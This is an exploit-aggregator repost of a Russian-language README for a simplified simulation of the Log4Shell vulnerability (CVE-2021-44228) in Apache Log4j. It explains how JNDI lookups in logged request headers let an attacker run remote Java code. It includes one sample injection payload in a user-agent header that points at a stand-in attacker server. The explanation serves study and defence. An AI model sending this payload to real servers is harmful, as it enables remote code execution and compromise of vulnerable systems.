Sploitus

Exploit for cve-2021-44228 CVE-2021-44228

kitploit · 2026-08-25

Exploit Code

MARKDOWN16 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NIKOLAS-CHARALAMBIDIS-CVE-2021-44228
![Java CI](https://github.com/Nikolas-Charalambidis/cve-2021-44228/actions/workflows/ci.yml/badge.svg)

# CVE-2021-44228

Этот репозиторий представляет собой упрощённую симуляцию известной проблемы CVE-2021-44228.

Помимо поиска системных свойств и других структур-словарей, Apache Log4j также реализует функцию JNDI-запроса по различным причинам. JNDI может получать службы от нескольких поставщиков услуг, таких как LDAP, DNS, реестр Java RMI и т.д. Сам JNDI является простым и небезопасным API, который не защищает от поставщиков услуг, контролируемых третьей стороной. Пока злоумышленник контролирует сервер, общедоступный по вредоносному URL, и знает, что именно логируется приложением, прослушивающим определённый порт, он может злоупотребить форматом логов, чтобы заставить приложение загрузить и выполнить произвольный Java-код через JNDI-инъекцию. Это можно передать через часто логируемые заголовки запросов как в открытом тексте, так и в обфусцированной форме.

root@kitploit:~
    
    
    user-agent: ${jndi:ldap://evilserver.com/payload}
    

Apache Log4j был уязвим для удаленного выполнения кода до выхода версии `2.16.0` 13 декабря, и авторы заслуживают моего уважения за их быструю реакцию.